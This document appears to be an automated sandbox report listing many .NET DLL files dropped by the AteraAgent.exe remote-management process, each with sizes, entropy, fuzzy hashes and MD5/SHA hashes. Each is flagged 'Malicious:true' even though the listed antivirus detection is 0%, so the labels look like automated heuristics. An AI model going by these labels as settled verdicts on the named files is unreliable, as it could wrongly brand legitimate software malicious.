                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.293461755167425
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:/dfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIdC:/xuJRRsnHnyhQupytM9z7O3zfXYvj8r1
                                                                                                                                                                                                                                                                                                                                  MD5:C8D82C0479C6AFFD9C03CEB554C57070
                                                                                                                                                                                                                                                                                                                                  SHA1:DD028B9E93A9FBCD92B6E576C102ABC05B5B696B
                                                                                                                                                                                                                                                                                                                                  SHA-256:DF23AFBDC67DAC8E555B958AC3282C7A5ED407EC6B3B9504ABC1357DA3C706E5
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D00CF4BA79515B6CFAD5E649DCE4FC9362CD2ACAAEBA8027D0C391D1D52BB29B4AEFF402A285393D89D46B4A042744C99437B797940BF9D44D20117E29A648E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.552967250210858
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYhNyb8E9VF6IYijSJIVxKtKf:nSCZUl2O1zCnXyzDeEpYi60kO
                                                                                                                                                                                                                                                                                                                                  MD5:4648AB15C70B48652E75E9C464D1159F
                                                                                                                                                                                                                                                                                                                                  SHA1:2E2CA96BE435DAC3C27D3AFF52DB179797DF9AA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:94C52D1166E65629234F1C9AADDBF8952A10575162CD62B7737B6C4F3BB83F25
                                                                                                                                                                                                                                                                                                                                  SHA-512:5A4943927C5B5073A4E04AF33319DB0DD80F57F196E56FD1AB9327D73608896A6D32927C30643C82DC09A08D2C3BF4A762FCC57C128E9BB4AD23E4F151354DD7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319256406884913
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:0UqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BCEpYi60tz:7LrgfPw3mXREaD76o
                                                                                                                                                                                                                                                                                                                                  MD5:4AF3070366532017700A74665137415C
                                                                                                                                                                                                                                                                                                                                  SHA1:16C9B507CBE0AA26C53FC062C701E8BBA0A3AC48
                                                                                                                                                                                                                                                                                                                                  SHA-256:2078F46C4B45CB45BBA47CDD4FC62B8694AB86FAAB07615D940599F572C1F01B
                                                                                                                                                                                                                                                                                                                                  SHA-512:17D9F2A80BBBD5C28088B78F15DF20C14563813A4E6ACF87C6BE7EF7B409A6A2B689146E4482AD07365AF94EF29EC7F1E571218BFD0CB26B513B855A888BB5F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.159600096602975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:EobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDt4NR:hbKKz1UeZk/Phv8lDuPaa
                                                                                                                                                                                                                                                                                                                                  MD5:E62F3260722E28821A1E88C7B0E80D7D
                                                                                                                                                                                                                                                                                                                                  SHA1:B41AF2B3EE10FEEE430B1D1E77378A74845B2B7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9B194B0D1D6A77559BECCCD5E282DDEE0B639295472C4C5B54D29CFDA5A7CDC4
                                                                                                                                                                                                                                                                                                                                  SHA-512:3F090C8B20B93F87CE0BB27054B2508601CD4FC4F04E024AD50B22DBDA5030BC7973EE064291644286F361CED7A64FEA80AFC67683C0D0BB53B25DEF9E6D6DDD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):150096
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.237638392383951
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:K0B07tjJYVNSCn+tn3nUMI000000I+49U2BL1krTPG:B07iSqSnkMDjy2
                                                                                                                                                                                                                                                                                                                                  MD5:CE874526DC410A3FB6FDAAE411460BC8
                                                                                                                                                                                                                                                                                                                                  SHA1:6A5465493B1183706F03CC2C4444BCB332061694
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B6C1BA4764B563445870520F492B2890FC58B45A138D33D4248716759A0A8B3
                                                                                                                                                                                                                                                                                                                                  SHA-512:7792408A85C416B2ACD4C3AFD4128819DCF82E620E361FCC0EA1BF62917FE5F8212B2222CC134E4A467C11136E73AF4DE09F1D7E9B2475559FB0EF4E5D56219E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.177649028870548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3tgEqel7clEfRWOuDXaVIWb0TadZjirgFDrGfmAXOaYbMlHEpYi60gZ:3iprEfsOuD0hhji6DrLbAg763Z
                                                                                                                                                                                                                                                                                                                                  MD5:A5EB9A8815D5A2CBAA49402D5D6CB44F
                                                                                                                                                                                                                                                                                                                                  SHA1:794060597244213FBC7A4A70C2E3BACBB97E9688
                                                                                                                                                                                                                                                                                                                                  SHA-256:0A23E41C0054097A87F3DFB498C6F337EC75B84B2C177793301CAC27505DA094
                                                                                                                                                                                                                                                                                                                                  SHA-512:7022EF67084B39779DAD4BD30E78991B314B83AAFA2F204505C8A0197A1D5DE617D3D2AA9E495458BEEA5BA68A6B48B75C15413AA9BEFB6D1467C15D2DA35920
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):34896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.286567257982752
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:U3wGplLcGsTK/lWNVz7MW+N92D1NlteVPEpYi60wW:U3wMZ1lWL7MW+N0peVo76/W
                                                                                                                                                                                                                                                                                                                                  MD5:831B477E111410FB32E4246A54ED8D1B
                                                                                                                                                                                                                                                                                                                                  SHA1:3FA0292E6809CB3E721AFCB181BC2669E5E15788
                                                                                                                                                                                                                                                                                                                                  SHA-256:114FE8C9E46C20C1C84FAEBF4275F5990D2166A07866602FE22189D37F9F2ECE
                                                                                                                                                                                                                                                                                                                                  SHA-512:73BABC599CF28879ECAFACBCFE5CF0A8637B1D198394724710FE6EF0B89BB369158F5223A1E329017352C92595FBF9F0B2FF379C438813CBAA30E32F201EF005
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):71248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.130135778780401
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MQuedlunqpC9yYxC9P7tt08eeykGlsESo3G76A:X3KICHxC9ZJexRsG3G7
                                                                                                                                                                                                                                                                                                                                  MD5:24184DBE4F4941C53A9269530C4040CC
                                                                                                                                                                                                                                                                                                                                  SHA1:513647F8D92BD5C39AADA6221400024F4388C23F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A6E5FDB3506CCDD6A87D21ABB9FD2A781C5433CF92730789B7A1FE32E03F747
                                                                                                                                                                                                                                                                                                                                  SHA-512:A1658B986E3D7A1CB65DA45E8C1B62ADE017CAF09E329340A29A1DCF1E07767D118039540F44F68737EAB6B8807F242D1F49D3388F3DE99F48C826A1CDD25DE5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):543312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.986962252482626
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:W6+HbUMHVgQO61+5ZpvsQ60OghEusa4UQgce0x7KjF76pkLzLFEnJEIfibgPKiU4:W6aRgsgfEU4UDcxkLzJEBsgPKiUYFHPZ
                                                                                                                                                                                                                                                                                                                                  MD5:113ABC811B9384F3DA77D938C2267CA2
                                                                                                                                                                                                                                                                                                                                  SHA1:8EEFC8B384C313177329CE763C649C00064F0CD4
                                                                                                                                                                                                                                                                                                                                  SHA-256:58552086C5A06A2DCC1C4D9D29FF74860839FAC029B763DFF924E16CBCDF1324
                                                                                                                                                                                                                                                                                                                                  SHA-512:E61ADAC5650E88F532757405C942B7485B8131004295A74356989509F7DBE588F7212955F629136791D00F1229CCBC7C29401D4930A162A3722E95354C61C8FA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
                                                                                                                                                                                                                                                                                                                                  SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                                                                                                                  SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                                                                                                                  SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.43329064965383
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                                                                                                                  SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                                                                                                                  SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                                                                                                                  SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                                                                                                                  SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                                                                                                                  SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                                                                                                                  SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                                                                                                                  MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                                                                                                                  SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                                                                                                                  SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):71312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.106692533939604
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:mxuAEP6SHdOP71+KXUk/lsQDzZfOmLeSo0df9Xzlu:eEP6SHdOItSlXfNeSdf9Xxu
                                                                                                                                                                                                                                                                                                                                  MD5:0631D48880E7DDDDE2733C133BA486BB
                                                                                                                                                                                                                                                                                                                                  SHA1:08BDC5C585123FA5F3B4D670DC92CBAA7620725A
                                                                                                                                                                                                                                                                                                                                  SHA-256:AAD8B9A018FC4C4601EDC7C9169370EEE26628C4D90F967C947BA9A81EC4B224
                                                                                                                                                                                                                                                                                                                                  SHA-512:3AD9C20EF888DBD78AD99673E2242ED45006F204FE704076C7791A681849E4A5DDFA9E38862F26DB8203262536E92F1757FDB6982A9FDE1625C3825D89F08A41
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):801048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                                                                                                                  MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                                                                                                                  SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                                                                                                                  SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                                                                                                                  SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):159904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.097873216527841
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:eXCCOOz54xuTlmyRmIazZ11Ip5ZUWISFogVJoQyaH5MbDiz:Wz5dQ/cpJISF5c8abC
                                                                                                                                                                                                                                                                                                                                  MD5:950CD24EA3A9EFE5CCE594A8B228AFDA
                                                                                                                                                                                                                                                                                                                                  SHA1:4609AC99EBD157E4C9BF7E276EEA961C4BB3AA4F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2AF781190AB7C97D6B846D5027745D609AD227665695E8ECB3AFD4CC9FCE6537
                                                                                                                                                                                                                                                                                                                                  SHA-512:2E8D0DE29E62732458472B8FA5AC35C48416E6AA5034BE309F688A095E6222A215EA3318FA02358707FBB98918983F2AB8996AC6703585485533ED4975AB7E3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):86816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.013720216920584
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:rqz3g47M9YIB/nRPP6eyO0MIq6y7suFvTbqtN0p7pqHUzH:rq3M5ftPzTLIq6y7sgytNK7p0Uz
                                                                                                                                                                                                                                                                                                                                  MD5:AAB8F9887FA45F30FE04472352E5AFEA
                                                                                                                                                                                                                                                                                                                                  SHA1:8244D05575D13E605B22538D7AE66D4805BC45C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:7DFACED56145F3C6B80DE25A09E0DF6729149EF3C6A8F8F1B559E93B914FD2DE
                                                                                                                                                                                                                                                                                                                                  SHA-512:97BA85978B48324908427833374CB3C19DE01F136D29A3ADCAC350A0555B30087513CD33BB7B18F0CB52CB3E8884E0ACD1BD256704A8B96EA0C4CA8A0F8135CE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:90289DA899746E328816734D723C93A0
